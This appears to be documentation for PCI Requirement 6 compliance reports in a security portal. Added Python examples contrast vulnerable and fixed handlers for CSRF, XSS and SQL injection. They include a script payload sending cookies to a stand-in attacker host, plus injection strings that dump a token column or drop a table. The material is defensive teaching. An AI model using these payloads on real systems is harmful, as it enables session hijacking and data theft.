6 – Maintain Secure Systems and Applications
In the Reports Portal, select > > > Reports or Dashboards > .
PCI Requirement 6 sets the expectation that you apply security patches to all applications and systems in the cardholder data environment (CDE) to protect them from malicious and unintentional misuse. The patches should be evaluated to ensure that they do not conflict with current security configurations. You must also ensure that in-house development teams practice secure coding techniques. Applications that store sensitive data must be able to protect the data.
To assess your enterprise's compliance with this requirement, use the following reports:
Broken Authentication and Session Management
Reports events associated with broken authentication and session management over time. The table provides results by the target asset, name and signature ID of the vulnerability, and the number of events.
Reports vulnerabilities associated with buffer overflows by CDE asset. This type of vulnerability occurs when a developer fails to bound writes of user-controlled data to the memory allocated for it. A malicious user can supply more data than a pre-allocated buffer can hold, overwriting adjacent memory; depending on what is overwritten, this crashes the program, corrupts its data, or lets the attacker run code of their choosing. The table provides results by the affected asset, the detected vulnerability, the signature ID of the vulnerability, and when the most recent event occurred.
Configuration Modifications by Host
Reports modifications made to CDE assets. The table provides results by the affected asset, the type of modification, the user who made the change, the number of events, and when the most recent event occurred.
Reports assets that might be vulnerable to a cross-site request forgery (CSRF, also written XSRF) attack. In a CSRF attack, also known as a one-click attack or session riding, a malicious site causes a victim's browser to submit a request to a web application that the victim is logged in to. Because the browser attaches the victim's session cookie automatically, the application treats the forged request as a legitimate command from an account that it trusts. The table provides results by the targeted asset and when the most recent event occurred.
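The mechanism described above, as an added example that is not part of the original page or the reporting product: a state-changing handler that authenticates on the session cookie alone is compared with one that also demands a per-session synchronizer token. The in-memory session store, the transfer handler, and the forged request are all constructed for illustration.

```python
import hmac
import secrets

# Constructed in-memory state standing in for a web app's session store and a
# transfers table (illustration only; not code from the page or the product).
SESSIONS = {}      # session_id -> {"user": ..., "csrf": token}
TRANSFERS = []     # (user, to_account, amount)


def login(user: str) -> str:
    """Create a session. A real browser would attach the returned id as a cookie
    on every later request to this site, including requests triggered by other sites."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid: str) -> str:
    """The token the legitimate page embeds in its form. Same-origin policy stops
    an attacker's page from reading it, which is what makes the check meaningful."""
    return SESSIONS[sid]["csrf"]


def transfer_vulnerable(cookie_sid: str, form: dict) -> bool:
    """Authenticates on the cookie alone: any site that makes the victim's browser
    POST here gets the transfer executed under the victim's account."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return False
    TRANSFERS.append((session["user"], form["to"], int(form["amount"])))
    return True


def transfer_protected(cookie_sid: str, form: dict) -> bool:
    """Requires a token bound to the session, compared in constant time.
    The forged request carries the cookie but cannot carry the token."""
    session = SESSIONS.get(cookie_sid)
    if session is None:
        return False
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, session["csrf"]):
        return False
    TRANSFERS.append((session["user"], form["to"], int(form["amount"])))
    return True


def forged_request(sid: str):
    """What a hidden auto-submitting form on an attacker's page produces: the victim's
    session id rides along as the cookie, but the form fields are the attacker's."""
    return sid, {"to": "attacker-acct", "amount": "5000"}
```

In a deployed application the same idea is usually combined with the `SameSite` cookie attribute and a check of the `Origin` header; the token check alone is enough to show why the cookie-only handler is the one this report would flag.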
Reports the signature ID of cross-site scripting (XSS) attacks by volume. XSS vulnerabilities enable malicious users to inject script into legitimate web pages or applications; the script then runs in a victim's web browser, with the privileges of the trusted site, when the browser parses the page. The scripts might hijack user sessions, deface web sites, or redirect users to harmful sites. A web application or web page becomes vulnerable when it includes untrusted data in its output without proper validation or output escaping, or when it lets user-supplied data build HTML or JavaScript through an API. XSS attacks tend to occur in forums, message boards, and web pages that allow comments. Malicious users can execute XSS attacks using VBScript, ActiveX, Flash, and CSS; however, this type of injection attack most commonly uses JavaScript. The table provides results by the signature ID of the event, the target asset, the number of events, and when the most recent event occurred.
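The "untrusted data without escaping" condition above, as an added example that is not code from the page or the product: a comment renderer that concatenates user data into HTML is shown beside one that encodes each value for the context it lands in. The two payloads and the template are constructed for illustration; the tag scanner at the end only exists to make the difference visible.

```python
import html
import re

# Constructed sample inputs (not from the original page): two payloads of the kind
# the report's XSS signatures match. The first targets an HTML text node, the second
# breaks out of a double-quoted attribute value.
TEXT_PAYLOAD = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
ATTR_PAYLOAD = '"><img src=x onerror="alert(document.cookie)">'


def render_vulnerable(comment: str, author: str) -> str:
    """Untrusted data concatenated straight into the page: the browser executes it."""
    return (
        '<div class="comment" title="' + author + '">'
        + comment
        + '</div>'
    )


def render_escaped(comment: str, author: str) -> str:
    """Same markup, but each value is encoded for the context it is placed in.

    html.escape(..., quote=True) turns < > & " ' into entities, which is the right
    encoding for HTML text nodes and for values inside quoted attributes. It is NOT
    sufficient for data placed inside <script>, inside a URL, or inside CSS; those
    contexts need their own encoders.
    """
    return (
        '<div class="comment" title="' + html.escape(author, quote=True) + '">'
        + html.escape(comment, quote=True)
        + '</div>'
    )


def tags_in(rendered: str) -> set:
    """Names of the HTML elements a browser would see in the rendered fragment.
    The template itself contributes only 'div'; anything else came from user data."""
    return {m.lower() for m in re.findall(r'<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)', rendered)}
```

Validation on input is still worth doing, but output encoding chosen per context is what actually removes the vulnerability; a comment that legitimately contains `<` must be displayable without becoming markup.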
Database Configuration Changes
Reports changes to the database configuration by affected asset. The table provides results by the database host, the modification made, the user who made the change, the number of changes, and when the most recent change occurred.
Reports vulnerabilities associated with improper access controls. The table provides results by the signature ID of the event, the target asset, the number of events, and when the most recent event occurred.
Reports vulnerabilities associated with improper handling of errors by affected assets. The table provides results by the signature ID of the event, the target asset, and when the most recent event occurred.
Reports the assets with the most injection flaws. The table provides results by the affected asset, the injection flaw and its signature ID, and when the event occurred.
Insecure Cryptographic Storage
Reports the IP addresses of systems where sensitive data is not stored securely. The table provides results by the affected asset, the event, the number of events, and when the most recent event occurred.
Meltdown or Spectre Vulnerable Assets
Reports the assets with the most Meltdown or Spectre vulnerabilities. The table provides results by the affected asset, the vulnerability and its signature ID, the number of events, and when the most recent event occurred.
Reports changes to operating systems. The table provides results by the target asset, the change, the outcome of the change, and the number of changes.
Outbound Communication from Development to Production
Reports all communication sent from the development environment to the production environment. The table provides results by the source and target addresses, the port used, the transport protocol, and the number of events.
In the logical model, you must edit the isSourceZonePCIDevelopment and isDestinationZonePCIProduction variables to indicate the respective zones for development and production.
Outbound Communication from Production to Development
Reports all communication sent from the production environment to the development environment. The table provides results by the source and target addresses, the port used, the transport protocol, and the number of events.
In the logical model, you must edit the isSourceZonePCIProduction and isDestinationZonePCIDevelopment variables to indicate the respective zones for production and development.
Reports assets, by IP address, that are missing security patches. One of the most common ways to reduce your environment's attack surface is to ensure that all systems have the most recent security patches applied. The table provides results by the affected asset, the vulnerability and signature ID associated with the missing patch, the number of events, and when the most recent event occurred.
Reports SQL injection vulnerabilities by asset. In a SQL injection attack, a malicious user supplies input that changes the structure of the queries an application sends to its database. The user could view, delete, or modify data not usually available for retrieval. A malicious user could also use SQL injection to cause a denial of service or to compromise other services, servers, or infrastructure reachable from the database. The table provides results by the target assets, the vulnerability and its signature ID, the number of events, and when the most recent event occurred.
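The query interference described above, as an added example that is not code from the page or the product: a lookup built by string concatenation is compared with a parameterized one against an in-memory SQLite table. The table, its rows, and the two payloads are constructed for illustration; the second payload shows how a column the query never selects (the card token) is pulled out through a UNION.

```python
import sqlite3

# Constructed sample data (not from the original page): a small card table of the
# kind a CDE application might query by owner. Tokens stand in for the sensitive column.
SAMPLE_ROWS = [
    ("alice", "1111", "tok_a1"),
    ("bob", "2222", "tok_b2"),
    ("carol", "3333", "tok_c3"),
]

# Constructed attacker inputs. The first turns the WHERE clause into a tautology;
# the second appends a UNION that reads the token column and comments out the
# trailing quote the application adds.
PAYLOAD_ALL_ROWS = "x' OR '1'='1"
PAYLOAD_UNION = "x' UNION SELECT owner, token FROM cards --"


def build_db() -> sqlite3.Connection:
    """Create the in-memory table and load the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE cards (id INTEGER PRIMARY KEY, owner TEXT, last4 TEXT, token TEXT)"
    )
    conn.executemany(
        "INSERT INTO cards (owner, last4, token) VALUES (?, ?, ?)", SAMPLE_ROWS
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, owner: str) -> list:
    """User input is spliced into the SQL text, so quotes in the input end the
    literal and the rest of the input becomes part of the query."""
    sql = "SELECT owner, last4 FROM cards WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, owner: str) -> list:
    """The query structure is fixed before the input is bound; the input is only
    ever compared as a value, so a payload simply matches no owner."""
    return conn.execute(
        "SELECT owner, last4 FROM cards WHERE owner = ?", (owner,)
    ).fetchall()
```

Parameterization is the fix; escaping quotes by hand is not, because numeric and identifier contexts have no quotes to escape. Stacked statements such as `'; DROP TABLE cards --` would be rejected by the sqlite3 module's one-statement-per-call rule, but many other drivers accept them, so do not rely on that.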
Use of Custom Accounts in Production
Reports events in the production environment associated with the specified list of accounts. The table provides results by the specified accounts, the target asset, the number of events, and when the most recent event occurred.
You must enter the accounts that you want to include in the report. Use commas to separate the values.